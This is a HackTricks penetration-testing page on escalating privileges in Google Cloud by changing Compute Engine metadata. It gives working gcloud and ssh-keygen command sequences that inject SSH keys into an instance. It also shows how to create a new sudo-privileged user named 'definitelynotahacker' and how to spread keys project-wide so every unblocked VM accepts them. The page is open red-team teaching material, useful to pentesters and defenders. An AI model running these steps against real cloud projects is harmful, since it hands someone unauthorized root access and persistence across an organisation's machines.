Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Metadata modification on an instance could lead to significant security risks if an attacker gains the necessary permissions.
On GCP, Linux systems often execute scripts from the Python Linux Guest Environment for Google Compute Engine. A critical component of this is the accounts daemon, which is designed to regularly check the instance metadata endpoint for updates to the authorized SSH public keys.
Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and integrated into the local system. The key will be added into ~/.ssh/authorized_keys
file of an existing user or potentially creating a new user with sudo
privileges, depending on the key's format. And the attacker will be able to compromise the host.
-
Examine Existing SSH Keys on the Instance:
- Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under
metadata
, specifically thessh-keys
key.gcloud compute instances describe [INSTANCE] --zone [ZONE]
- Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon.
- Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under
-
Prepare a Text File for SSH Key Metadata:
- Save the details of usernames and their corresponding SSH keys into a text file named
meta.txt
. This is essential for preserving the existing keys while adding new ones.
- Save the details of usernames and their corresponding SSH keys into a text file named
-
Generate a New SSH Key for the Target User (
alice
in this example):- Use the
ssh-keygen
command to generate a new SSH key, ensuring that the comment field (-C
) matches the target username.ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
- Add the new public key to
meta.txt
, mimicking the format found in the instance's metadata.
- Use the
-
Update the Instance's SSH Key Metadata:
- Apply the updated SSH key metadata to the instance using the
gcloud compute instances add-metadata
command.gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
- Apply the updated SSH key metadata to the instance using the
-
Access the Instance Using the New SSH Key:
- Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (
alice
in this example).ssh -i ./key alice@localhost sudo id
- Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (
If no interesting user is found, it's possible to create a new one which will be given sudo
privileges:
# define the new account username
NEWUSER="definitelynotahacker"
# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
# create the input meta file
NEWKEY="$(cat ./key.pub)"
echo "$NEWUSER:$NEWKEY" > ./meta.txt
# update the instance metadata
gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt
# ssh to the new account
ssh -i ./key "$NEWUSER"@localhost
It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by applying SSH keys at the project level. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide:
-
Apply SSH Keys at the Project Level:
- Use the
gcloud compute project-info add-metadata
command to add SSH keys frommeta.txt
to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled.gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
- Use the
-
SSH into Instances Using Project-Wide Keys:
- With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access.
- A direct method to SSH into an instance is using the
gcloud compute ssh [INSTANCE]
command. This command uses your current username and the SSH keys set at the project level to attempt access.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.